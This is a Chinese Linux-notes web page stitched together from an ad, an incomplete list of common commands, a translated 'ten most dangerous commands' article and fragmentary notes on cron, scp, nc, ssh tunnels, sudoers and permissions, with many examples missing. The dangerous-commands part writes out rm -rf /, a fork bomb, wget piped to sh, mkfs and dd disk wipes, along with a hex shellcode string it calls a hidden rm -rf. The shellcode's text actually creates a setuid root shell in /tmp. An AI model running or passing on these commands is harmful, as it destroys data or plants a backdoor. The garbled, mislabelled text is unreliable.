linux以下哪些命令是危險(xiǎn)操作，會(huì)引起系統(tǒng)異常

Linux系統(tǒng)中的命令實(shí)在是太多了，簡(jiǎn)單包括兩類命令，一類是內(nèi)部命令，指的是Shell自身提供的功能，一類是外部命令，指的是第三方的控制臺(tái)應(yīng)用程序。

站在用戶的角度思考問(wèn)題，與客戶深入溝通，找到齊齊哈爾網(wǎng)站設(shè)計(jì)與齊齊哈爾網(wǎng)站推廣的解決方案，憑借多年的經(jīng)驗(yàn)，讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合，創(chuàng)造個(gè)性化、用戶體驗(yàn)好的作品，建站類型包括：成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站建設(shè)、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、申請(qǐng)域名、網(wǎng)頁(yè)空間、企業(yè)郵箱。業(yè)務(wù)覆蓋齊齊哈爾地區(qū)。

一般來(lái)說(shuō)，沒(méi)必要完全學(xué)習(xí)所有的命令，大體上有個(gè)印象，用到的時(shí)候去查一下幫助文檔，久而久之，自然熟練。

下面是網(wǎng)友整理的20個(gè)最常用的Linux命令：

1. ls命令

ls命令是列出目錄內(nèi)容(List Directory Contents)的意思。運(yùn)行它就是列出文件夾里的內(nèi)容，可能是文件也可能是文件夾。

2. lsblk命令

"lsblk"就是列出塊設(shè)備。除了RAM外，以標(biāo)準(zhǔn)的樹狀輸出格式，整齊地顯示塊設(shè)備。

3. md5sum命令

“md5sum”就是計(jì)算和檢驗(yàn)MD5信息簽名。md5 checksum(通常叫做哈希)使用匹配或者驗(yàn)證文件的文件的完整性，因?yàn)槲募赡芤驗(yàn)閭鬏斿e(cuò)誤，磁盤錯(cuò)誤或者無(wú)惡意的干擾等原因而發(fā)生改變。

4. dd命令

“dd”命令代表了轉(zhuǎn)換和復(fù)制文件?？梢杂脕?lái)轉(zhuǎn)換和復(fù)制文件，大多數(shù)時(shí)間是用來(lái)復(fù)制iso文件(或任何其它文件)到一個(gè)usb設(shè)備(或任何其它地方)中去，所以可以用來(lái)制作USB啟動(dòng)器。

6. history命令

“history”命令就是歷史記錄。它顯示了在終端中所執(zhí)行過(guò)的所有命令的歷史。

7. sudo命令

“sudo”(super user do)命令允許授權(quán)用戶執(zhí)行超級(jí)用戶或者其它用戶的命令。通過(guò)在sudoers列表的安全策略來(lái)指定。

8. mkdir命令

“mkdir”(Make directory)命令在命名路徑下創(chuàng)建新的目錄。然而如果目錄已經(jīng)存在了，那么它就會(huì)返回一個(gè)錯(cuò)誤信息"不能創(chuàng)建文件夾，文件夾已經(jīng)存在了"("cannot create folder, folder already exists")

9. touch 命令

“touch”命令代表了將文件的訪問(wèn)和修改時(shí)間更新為當(dāng)前時(shí)間。touch命令只會(huì)在文件不存在的時(shí)候才會(huì)創(chuàng)建它。如果文件已經(jīng)存在了，它會(huì)更新時(shí)間戳，但是并不會(huì)改變文件的內(nèi)容。

10. chmod 命令

“chmod”命令就是改變文件的模式位。chmod會(huì)根據(jù)要求的模式來(lái)改變每個(gè)所給的文件，文件夾，腳本等等的文件模式（權(quán)限）。

11. chown命令

“chown”命令就是改變文件擁有者和所在用戶組。每個(gè)文件都屬于一個(gè)用戶組和一個(gè)用戶。在你的目錄下，使用"ls -l",你就會(huì)看到像這樣的東西。

12. apt命令

Debian系列以“apt”命令為基礎(chǔ)，“apt”代表了Advanced Package Tool。APT是一個(gè)為Debian系列系統(tǒng)（Ubuntu，Kubuntu等等）開發(fā)的高級(jí)包管理器，在Gnu/Linux系統(tǒng)上，它會(huì)為包自動(dòng)地，智能地搜索，安裝，升級(jí)以及解決依賴。

13. tar命令

“tar”命令是磁帶歸檔(Tape Archive)，對(duì)創(chuàng)建一些文件的的歸檔和它們的解壓很有用。

14. cal 命令

“cal”（Calender），它用來(lái)顯示當(dāng)前月份或者未來(lái)或者過(guò)去任何年份中的月份。

16. cat命令

“cat”代表了連結(jié)（Concatenation），連接兩個(gè)或者更多文本文件或者以標(biāo)準(zhǔn)輸出形式打印文件的內(nèi)容。

17. cp 命令

“copy”就是復(fù)制。它會(huì)從一個(gè)地方復(fù)制一個(gè)文件到另外一個(gè)地方。

18. mv 命令

“mv”命令將一個(gè)地方的文件移動(dòng)到另外一個(gè)地方去。

19. pwd 命令

“pwd”（print working directory），在終端中顯示當(dāng)前工作目錄的全路徑。

20. cd 命令

最后，經(jīng)常使用的“cd”命令代表了改變目錄。它在終端中改變工作目錄來(lái)執(zhí)行，復(fù)制，移動(dòng)，讀，寫等等操作。

Linux中最危險(xiǎn)的10個(gè)命令

Linux中最危險(xiǎn)的10個(gè)命令

對(duì)于編程人員或或者Linux系統(tǒng)管理員來(lái)說(shuō)，操作Linux系統(tǒng)最常見(jiàn)的方法就是使用命令行。當(dāng)然，Linux命令行佷有用、很高效，但有時(shí)候也很危險(xiǎn)，尤其是在你誤操作或者不確定你自己在正在做什么的時(shí)候。下面我就為大家盤點(diǎn)最危險(xiǎn)是10個(gè)命令，一起來(lái)看看吧!

當(dāng)然，以下命令通常都是在root權(quán)限下才能將愚蠢發(fā)揮到無(wú)可救藥;在普 通用戶身份下，破壞的只是自己的一畝三分地。

1. rm -rf 命令

rm -rf命令是刪除文件夾及其內(nèi)容最快的方式之一。僅僅一丁點(diǎn)的敲錯(cuò)或無(wú)知都可能導(dǎo)致不可恢復(fù)的系統(tǒng)崩壞。下列是一些rm 命令的選項(xiàng)。

rm　命令在Linux下通常用來(lái)刪除文件。

rm -r 命令遞歸的刪除文件夾，甚至是空的文件夾。(譯注：個(gè)人認(rèn)為此處應(yīng)該是說(shuō)錯(cuò)了，從常識(shí)看，應(yīng)該是“甚至是非空的文件夾”)

rm -f 命令能不經(jīng)過(guò)詢問(wèn)直接刪除‘只讀文件’。(譯注：Linux下刪除文件并不在乎該文件是否是只讀的，而只是在意其父目錄是否有寫權(quán)限。所以，-f這個(gè)參數(shù) 只是表示不必一個(gè)個(gè)刪除確認(rèn)，而是一律悄悄刪除。另外，原始的rm命令其實(shí)也是沒(méi)有刪除提示的，只是一般的發(fā)行版都會(huì)將rm通過(guò)別名的方式增加-i參數(shù)來(lái) 要求刪除確認(rèn)，而-f則抑制了這個(gè)提示。)

rm -rf / : 強(qiáng)制刪除根目錄下所有東東。(就是說(shuō)刪除完畢后，什么也沒(méi)有了。。。)

rm -rf *:　強(qiáng)制刪除當(dāng)前目錄的所有文件。

rm -rf . : 強(qiáng)制刪除當(dāng)前文件夾及其子文件夾。

從 現(xiàn)在起，當(dāng)你要執(zhí)行rm -rf命令時(shí)請(qǐng)留心一點(diǎn)。我們可以在“.bashrc”文件對(duì)‘rm‘命令創(chuàng)建rm -i的別名，來(lái)預(yù)防用 ‘rm‘命令刪除文件時(shí)的事故，它會(huì)要求你確認(rèn)每一個(gè)刪除請(qǐng)求。(譯注：大多數(shù)發(fā)行版已經(jīng)這樣做了，如果還沒(méi)有，請(qǐng)這樣做，并在使用-f參數(shù)前一定考慮好 你在做什么!譯者本人有著血淚的教訓(xùn)啊。)

2. :(){:|:};: 命令

這就是個(gè)fork 炸彈的實(shí)例。具體操作是通過(guò)定義一個(gè)名為 ‘:‘的函數(shù)，它會(huì)調(diào)用自己兩次，一次在前臺(tái)另一次運(yùn)行在后臺(tái)。它會(huì)反復(fù)的執(zhí)行下去直到系統(tǒng)崩潰。

:(){:|:};:

哦?你確認(rèn)你要試試么?千萬(wàn)別在公司正式的服務(wù)器上實(shí)驗(yàn)啊~~

3. 命令　 /dev/sda

上列命令會(huì)將某個(gè)‘命令‘的輸出寫到塊設(shè)備/dev/sda中。該操作會(huì)將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù)，從而導(dǎo)致整個(gè)塊設(shè)備的數(shù)據(jù)丟失。

4. mv 文件夾 /dev/null

這 個(gè)命令會(huì)移動(dòng)某個(gè)‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設(shè)備是一個(gè)特殊的文件，所有寫入它的數(shù)據(jù)都會(huì)被清除，然后返回寫操作成功。(譯注：這就是黑洞啊。當(dāng)然，要說(shuō)明的是，通過(guò)將文件夾移動(dòng)到黑洞，并不能阻止 數(shù)據(jù)恢復(fù)軟件的救贖，所以，真正的`徹底毀滅，需要采用專用的軟件或者手法來(lái)完成——我知道你肯定有些東西想刪除得干干凈凈的。)

# mv /home/user/* /dev/null

上列命令會(huì)將User目錄所有內(nèi)容移動(dòng)到/dev/null，這意味著所有東西都被‘卷入’黑洞　(null)之中。

5. wget -O- | sh

上列命令會(huì)從一個(gè)(也許是)惡意源下載一個(gè)腳本并執(zhí)行。Wget命令會(huì)下載這個(gè)腳本，而sh會(huì)(無(wú)條件的)執(zhí)行下載下來(lái)的腳本。

注意: 你應(yīng)該時(shí)刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。(譯注：所以，你真的知道你在做什么嗎?當(dāng)遇到這種需要是，我的做法是，先wget下來(lái)，然后我去讀一讀其中到底寫了些什么，然后考慮是否執(zhí)行。)

6. mkfs.ext3 /dev/sda

上列命令會(huì)格式化塊設(shè)備‘sda’，你無(wú)疑知道在執(zhí)行上列命令后你的塊設(shè)備(硬盤驅(qū) 動(dòng)器)會(huì)被格式化，嶄新的!沒(méi)有任何數(shù)據(jù)，直接讓你的系統(tǒng)達(dá)到不可恢復(fù)的階段。(譯注：通常不會(huì)直接使用/dev/sda這樣的設(shè)備，除非是作為raw設(shè) 備使用，一般都需要將sda分成類似sda1、sda2這樣的分區(qū)后才使用。當(dāng)然，無(wú)論你使用sda還是sda1，這樣對(duì)塊設(shè)備或分區(qū)進(jìn)行mkfs都是毀 滅性的，上面的數(shù)據(jù)都會(huì)被蒸發(fā)了。)

7. file

上列命令常用來(lái)清空文件內(nèi)容(譯注：通常也用于記錄命令輸出。 不過(guò)請(qǐng)?jiān)趫?zhí)行前，確認(rèn)輸出的文件是空的或者還不存在，否則原來(lái)的文件可真是恢復(fù)不了了——連數(shù)據(jù)恢復(fù)軟件都未必能幫助你了。另外，我想你可能真正想用的是 “”，即累加新的輸出到文件，而不是刷新那個(gè)文件。)。如果用上列執(zhí)行時(shí)輸入錯(cuò)誤或無(wú)知的輸入類似 “xt.conf”　的命令會(huì)覆蓋配置文件或其他任何的系統(tǒng)配置文件。

8. ^foo^bar

這個(gè)命令在“鮮為人知而又實(shí)用的 Linux 命令大全：”中描述過(guò)，用來(lái)編輯先前運(yùn)行的命令而無(wú)需重打整個(gè)命令。但當(dāng)用foobar命令時(shí)如果你沒(méi)有徹底檢查改變?cè)济畹娘L(fēng)險(xiǎn)，這可能導(dǎo)致真正的麻煩。(譯注：事實(shí)上，這種小技巧是譯者認(rèn)為的，少數(shù)史前時(shí)代遺留下來(lái)的無(wú)用而有害的“黑客”技巧。)

9. dd if=/dev/random of=/dev/sda

上列命令會(huì)向塊設(shè)備sda寫入隨機(jī)的垃圾文件從而擦出數(shù)據(jù)。當(dāng)然!你的系統(tǒng)可能陷入混亂和不可恢復(fù)的狀態(tài)。(譯注：記得上面說(shuō)過(guò)mv到黑洞并不能徹底刪除數(shù)據(jù)么?那么這個(gè)命令就是給了你一個(gè)徹底刪除的方法!當(dāng)然為了保險(xiǎn)起見(jiàn)，你可以覆寫多次。)

10. 隱藏命令

下面的命令其實(shí)就是上面第一個(gè)命令 (rm -rf)。這里的代碼是隱藏在十六進(jìn)制里的,一個(gè)無(wú)知的用戶可能就會(huì)被愚弄。在終端里運(yùn)行下面命令可能會(huì)擦除你的根分區(qū)。

這個(gè)命令表明通常真正的危險(xiǎn)是隱藏的，不會(huì)被輕易的檢測(cè)到。你必須時(shí)刻留心你在做什么結(jié)果會(huì)怎樣。不要編譯/運(yùn)行從未知來(lái)源的代碼。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

注意: 不要在你的或你的同學(xué)或?qū)W校的電腦里的Linux終端或Shell執(zhí)行以上的任何一個(gè)命令，因?yàn)檫@將導(dǎo)致數(shù)據(jù)丟失或者系統(tǒng)崩潰。如果你想測(cè)試它們，請(qǐng)?jiān)谔摂M機(jī)上運(yùn)行。

;

Linux命令

快照功能：記錄當(dāng)前的硬盤的狀態(tài)。剛建快照時(shí)快照占用內(nèi)存為0，標(biāo)記了當(dāng)前硬盤的存儲(chǔ)狀態(tài)。當(dāng)虛擬機(jī)對(duì)快照標(biāo)記的內(nèi)容改寫時(shí)，會(huì)將改寫的內(nèi)容存儲(chǔ)進(jìn)快照，與未改寫的部分整合得到完整的快照。當(dāng)快照標(biāo)記的部分被完全改寫，那么快照存儲(chǔ)空間完整記錄了當(dāng)時(shí)拍攝時(shí)的內(nèi)存狀態(tài)。

參數(shù)形式

第一種：參數(shù)用一橫的說(shuō)明后面的參數(shù)是字符形式。

第二種：參數(shù)用兩橫的說(shuō)明后面的參數(shù)是單詞形式。

第三種：參數(shù)前有橫的是 System V風(fēng)格。

第四種：參數(shù)前沒(méi)有橫的是 BSD風(fēng)格。

cat、more、less、head、tail命令的比較：

cat命令可以一次顯示整個(gè)文件，如果文件比較大，使用不是很方便；

more命令可以讓屏幕在顯示滿一屏幕時(shí)暫停，按空格往前翻頁(yè)，按b往后翻頁(yè)。

less命令也可以分頁(yè)顯示文件，和more命令的區(qū)別就在于： 支持上下鍵卷動(dòng)屏幕、查找；不需要在一開始就讀取整個(gè)文件，打開大文件時(shí)比more、vim更快。

head命令用于查看文件的前n行。

tail命令用于查看文件的后n行，加上-f命令，查看在線日志非常方便，可以打印最新增加的日志。

一般模式：

編輯模式：

命令模式：

編碼

多行操作(列編輯模式)

插入：ctrl+v進(jìn)入列編輯模式，上下移動(dòng)光標(biāo)選擇需要插入的位置，然后輸入大寫I，輸入需要文本，最后按esc鍵退出，就會(huì)發(fā)現(xiàn)文本會(huì)在選擇的多行中插入。

刪除：ctrl+v進(jìn)入列編輯模式，上下移動(dòng)光標(biāo)選中需要?jiǎng)h除的部分，然后按d，就會(huì)刪除選中的內(nèi)容。

①head：顯示文件頭部?jī)?nèi)容

②tail：輸出文件尾部?jī)?nèi)容

注意：用vim和vi修改內(nèi)容會(huì)刪除源文件并生成新文件，所以tail -f會(huì)失效。需要用到

追加和覆蓋語(yǔ)句（或），才能被tail -f監(jiān)視到。

一般用于查看小文件

查看壓縮文件中的文本內(nèi)容

例：

①more：文件內(nèi)容分屏查看器

②less：分屏顯示文件內(nèi)容，效率比more高

1、簡(jiǎn)單讀取

運(yùn)行腳本如下

測(cè)試結(jié)果為：

2、-p 參數(shù)，允許在 read 命令行中直接指定一個(gè)提示。

運(yùn)行腳本如下

測(cè)試結(jié)果為：

echo [選項(xiàng)] [輸出內(nèi)容] （輸出內(nèi)容到控制臺(tái)）

輸出給定文本的sha256加密后的內(nèi)容

①顯示當(dāng)前時(shí)間信息

②顯示當(dāng)前時(shí)間年月日

③顯示當(dāng)前時(shí)間年月日時(shí)分秒

④顯示昨天

⑤顯示明天時(shí)間

⑥顯示上個(gè)月時(shí)間

需要注意的是取下個(gè)月的命令存在bug，執(zhí)行如下命令會(huì)得到21-10，但是正常應(yīng)該得到21-09，需要注意

date -d "2021-08-31 +1 month" +%y-%m

⑦修改系統(tǒng)時(shí)間

⑧獲取當(dāng)前時(shí)間戳

獲取秒時(shí)間戳： date +%s

獲取毫秒時(shí)間戳：$[ (date +%s%N) /1000000]

查看日歷

（1）查看當(dāng)前月的日歷

（2）查看2017年的日歷

例：

對(duì)比gzip/gunzip，zip/unzip可以壓縮文件和目錄且保留源文件。

①zip：壓縮

②unzip：解壓縮

只能壓縮文件不能壓縮目錄，不保留原來(lái)的文件。

gzip 文件 （只能將文件壓縮為*.gz文件）

gunzip 文件.gz （解壓縮文件命令）

例： crontab -e

（1）進(jìn)入crontab編輯界面。會(huì)打開vim編輯你的工作。

（2）每隔1分鐘，向/root/bailongma.txt文件中添加一個(gè)11的數(shù)字

*/1 * * * * /bin/echo ”11” /root/bailongma.txt

（3）可以用tail -f 目標(biāo)文件來(lái)實(shí)施監(jiān)控追加的內(nèi)容

查看日志

可以用tail -f /var/log/cron.log觀察

Cron表達(dá)式見(jiàn)文章：

ls [選項(xiàng)] [目錄或是文件]

cd [參數(shù)]

例： cd -P $(dirname $p1) ； pwd 先跳轉(zhuǎn)到文件的所在目錄，再打印$p1文件的實(shí)際路徑

概述

①cp（copy）：只能在本機(jī)中復(fù)制

②scp（secure copy）：可以復(fù)制文件給遠(yuǎn)程主機(jī)

scp -r test.sh hxr@hadoop102:/root

③rsync（remote sync）：功能與scp相同，但是不會(huì)改文件屬性

rsync -av test.sh test.sh hxr@hadoop102:/root

④nc（netcat）：監(jiān)聽(tīng)端口，可以實(shí)現(xiàn)機(jī)器之間傳輸文件。

nc -lk 7777 (-l表示listen，-k表示keep)

強(qiáng)制覆蓋不提示的方法：\cp

例：scp -r test.sh hxr@bigdata1:/root

例：rsync -av test.sh hxr@bigdata1:/root

例：

nc -lp 10000 nc_test.txt

nc -w 1 hadoop102 nc_test.txt

遠(yuǎn)程登錄時(shí)默認(rèn)使用的私鑰為~/.ssh/id_rsa

生成密鑰對(duì)

將公鑰發(fā)送到本機(jī)

將密鑰發(fā)送到需要登錄到本機(jī)的服務(wù)器上

修改密鑰的權(quán)限

遠(yuǎn)程登陸

如果有多個(gè)節(jié)點(diǎn)需要遠(yuǎn)程登陸，可以在.ssh下創(chuàng)建config并輸入

再次登陸

①正向代理：

②反向代理：

所謂“反向代理”就是讓遠(yuǎn)端啟動(dòng)端口，把遠(yuǎn)端端口數(shù)據(jù)轉(zhuǎn)發(fā)到本地。

HostA 將自己可以訪問(wèn)的 HostB:PortB 暴露給外網(wǎng)服務(wù)器 HostC:PortC，在 HostA 上運(yùn)行：

那么鏈接 HostC:PortC 就相當(dāng)于鏈接 HostB:PortB。

使用時(shí)需修改 HostC 的 /etc/ssh/sshd_config 的一條配置如下，不然啟動(dòng)的進(jìn)程監(jiān)聽(tīng)的ip地址為127.0.0.1，即只有本機(jī)可以訪問(wèn)該端口。

相當(dāng)于內(nèi)網(wǎng)穿透，比如 HostA 和 HostB 是同一個(gè)內(nèi)網(wǎng)下的兩臺(tái)可以互相訪問(wèn)的機(jī)器，HostC是外網(wǎng)跳板機(jī)，HostC不能訪問(wèn) HostA，但是 HostA 可以訪問(wèn) HostC。

那么通過(guò)在內(nèi)網(wǎng) HostA 上運(yùn)行 ssh -R 告訴 HostC，創(chuàng)建 PortC 端口監(jiān)聽(tīng)，把該端口所有數(shù)據(jù)轉(zhuǎn)發(fā)給我（HostA），我會(huì)再轉(zhuǎn)發(fā)給同一個(gè)內(nèi)網(wǎng)下的 HostB:PortB。

同內(nèi)網(wǎng)下的 HostA/HostB 也可以是同一臺(tái)機(jī)器，換句話說(shuō)就是 內(nèi)網(wǎng) HostA 把自己可以訪問(wèn)的端口暴露給了外網(wǎng) HostC。

例： 比如在我的內(nèi)網(wǎng)機(jī)192.168.32.244上有一個(gè)RabbitMQ的客戶端，端口號(hào)為15672?，F(xiàn)在我希望在外網(wǎng)上訪問(wèn)固定ip的云服務(wù)器chenjie.asia的6009端口，通過(guò)跳板機(jī)192.168.32.243來(lái)轉(zhuǎn)發(fā)請(qǐng)求到192.168.32.244:15672，從而實(shí)現(xiàn)在外網(wǎng)訪問(wèn)內(nèi)網(wǎng)服務(wù)的功能，即內(nèi)網(wǎng)穿透。

①在192.168.32.244上啟動(dòng)RabbitMQ服務(wù)

②將chenjie.asia云服務(wù)器的私鑰復(fù)制到跳板機(jī)192.168.32.243的~/.ssh下，并重命名為id_rsa。通過(guò)如下命令看是否可以遠(yuǎn)程登陸到云服務(wù)，可以登陸則進(jìn)行下一步。

③修改chenjie.asia服務(wù)器的ssh配置文件 /etc/ssh/sshd_config ，允許其他節(jié)點(diǎn)訪問(wèn)

然后重啟sshd服務(wù)

④在跳板機(jī)192.168.32.243啟動(dòng)ssh反向代理

這個(gè)進(jìn)程在關(guān)閉session時(shí)會(huì)停止，可以添加啟動(dòng)參數(shù) -CPfN

例：

以 root 身份執(zhí)行的程序有了所有特權(quán)，這會(huì)帶來(lái)安全風(fēng)險(xiǎn)。Kernel 從 2.2 版本開始，提供了 Capabilities 功能，它把特權(quán)劃分成不同單元，可以只授權(quán)程序所需的權(quán)限，而非所有特權(quán)。

例如：linux不允許非root賬號(hào)只用1024以下的端口，使用root啟動(dòng)命令nginx，會(huì)導(dǎo)致nginx權(quán)限過(guò)高太危險(xiǎn)。所以用setcap命令

sudo setcap cap_net_bind_service=+eip /bigdata/nginx/sbin/nginx

正確的關(guān)機(jī)流程為 ：sync shutdown reboot halt

（1）sync （功能描述：將數(shù)據(jù)由內(nèi)存同步到硬盤中）

（2）halt （功能描述：關(guān)閉系統(tǒng)，等同于shutdown -h now 和 poweroff）

（3）reboot （功能描述：就是重啟，等同于 shutdown -r now）

（4）shutdown [選項(xiàng)] [時(shí)間]

安裝

yum install -y telnet-server telnet

ls -i 顯示文件的節(jié)點(diǎn)號(hào)

find -inum 節(jié)點(diǎn)號(hào) -delete 刪除指定的節(jié)點(diǎn)即可刪除對(duì)應(yīng)的文件

啟動(dòng)一個(gè)服務(wù)： systemctl start postfix.service

關(guān)閉一個(gè)服務(wù)： systemctl stop postfix.service

重啟一個(gè)服務(wù)： systemctl restart postfix.service

顯示一個(gè)服務(wù)的狀態(tài)： systemctl status postfix.service

在開機(jī)時(shí)啟用一個(gè)服務(wù)： systemctl enable postfix.service

在開機(jī)時(shí)禁用一個(gè)服務(wù)： systemctl disable postfix.service

注：在enable的時(shí)候會(huì)打印出來(lái)該啟動(dòng)文件的位置

列出所有已經(jīng)安裝的服務(wù)及狀態(tài)：

systemctl list-units

systemctl list-unit-files

查看服務(wù)列表狀態(tài):

systemctl list-units --type=service

查看服務(wù)是否開機(jī)啟動(dòng)： systemctl is-enabled postfix.service

查看已啟動(dòng)的服務(wù)列表： systemctl list-unit-files | grep enabled

查看啟動(dòng)失敗的服務(wù)列表： systemctl --failed

查看服務(wù)日志： journalctl -u postfix -n 10 -f

命令類似systemctl，用于操作native service。

添加腳本為服務(wù)(需要指定啟動(dòng)級(jí)別和優(yōu)先級(jí))： chkconfig --add [腳本]

刪除服務(wù)： chkconfig --del [腳本]

單獨(dú)查看某一服務(wù)是否開機(jī)啟動(dòng)的命令 ： chkconfig --list [服務(wù)名]

單獨(dú)開啟某一服務(wù)的命令 ： chkconfig [服務(wù)名] on

單獨(dú)關(guān)閉某一服務(wù)的命令： chkconfig [服務(wù)名] off

查看某一服務(wù)的狀態(tài)： /etc/intd.d/[服務(wù)名] status

啟用服務(wù)就是在當(dāng)前"runlevel"的配置文件目錄 /etc/systemd/system/multi-user.target.wants 里，建立 /usr/lib/systemd/system 里面對(duì)應(yīng)服務(wù)配置文件的軟鏈接；禁用服務(wù)就是刪除此軟鏈接，添加服務(wù)就是添加軟連接。

su 用戶名稱 （切換用戶，只能獲得用戶的執(zhí)行權(quán)限，不能獲得環(huán)境變量）

su - 用戶名稱 （切換到用戶并獲得該用戶的環(huán)境變量及執(zhí)行權(quán)限）

echo $PATH 打印環(huán)境變量

設(shè)置普通用戶具有root權(quán)限

修改 /etc/sudoers 文件，找到下面一行(91行)，在root下面添加一行，如下 所示：

或者配置成采用sudo命令時(shí)，不需要輸入密碼

修改完畢，現(xiàn)在可以用hxr 帳號(hào)登錄，然后用命令 sudo ，即可獲得root權(quán)限進(jìn)行操作。

以azkaban用戶執(zhí)行引號(hào)中的命令

gpasswd -d [username] [groupname] 將用戶從組中刪除

gpasswd -a [username] [groupname] 將用戶加入到組中

用戶組的管理涉及用戶組的添加、刪除和修改。組的增加、刪除和修改實(shí)際上就是對(duì) /etc/group文件的更新。

0首位表示類型 - 代表文件 d 代表目錄 l 鏈接文檔(link file)

三種特殊權(quán)限suid、sgid、sticky

例子:

變更文件權(quán)限方式一

例：chmod u-x,o+x houge.txt

變更文件權(quán)限方式二

例：chmod -R 777 /mnt/ 修改整個(gè)文件夾的文件權(quán)限

在linux中創(chuàng)建文件或者目錄會(huì)有一個(gè)默認(rèn)權(quán)限的，這個(gè)默認(rèn)權(quán)限是由umask決定的（默認(rèn)為0022）。umask設(shè)置的是權(quán)限的“補(bǔ)碼”，而我們常用chmod設(shè)置的是文件權(quán)限碼。一般在/etc/profile 、~/.bashprofile 或者 ~/.profile中設(shè)置umask值。

umask計(jì)算

如root用戶的默認(rèn)umask為0022(第一個(gè)0 代表特殊權(quán)限位，這里先不考慮)，創(chuàng)建的文件默認(rèn)權(quán)限是644(即默認(rèn)666掩上umask的022)，創(chuàng)建的目錄是755(即默認(rèn)777掩上umask的022)。

對(duì)于root用戶的umask=022這個(gè)來(lái)說(shuō)，777權(quán)限二進(jìn)制碼就是（111）（111）（111），022權(quán)限二進(jìn)制碼為（000）（010）（010）。

上面就是一個(gè)umask的正常計(jì)算過(guò)程，但是這樣實(shí)在是太麻煩了。我們使用如下的簡(jiǎn)單的方法快速計(jì)算。

上面的這個(gè)方法計(jì)算是非常方便的， 為何得到奇數(shù)要+1呢？

文件的最大權(quán)限是666，都是偶數(shù)，你得到奇數(shù)，說(shuō)明你的umask有奇數(shù)啊，讀為4，寫為2，都是偶數(shù)，說(shuō)明你有執(zhí)行權(quán)限的。

就按照上面的umask=023為例，在計(jì)算其他用戶權(quán)限的時(shí)候6-3=3 ，6是讀寫，3是寫和執(zhí)行，其實(shí)應(yīng)該是讀寫權(quán)限減去讀權(quán)限的得到寫權(quán)限的，相當(dāng)于我們多減去了一個(gè)執(zhí)行權(quán)限。所以結(jié)果加1。

umask修改

如果想單獨(dú)修改某個(gè)文件夾的新建文件的權(quán)限，可以使用setfacl命令。

例：遞歸改變文件所有者和所有組 chown -R hxr:hxr /mnt

例：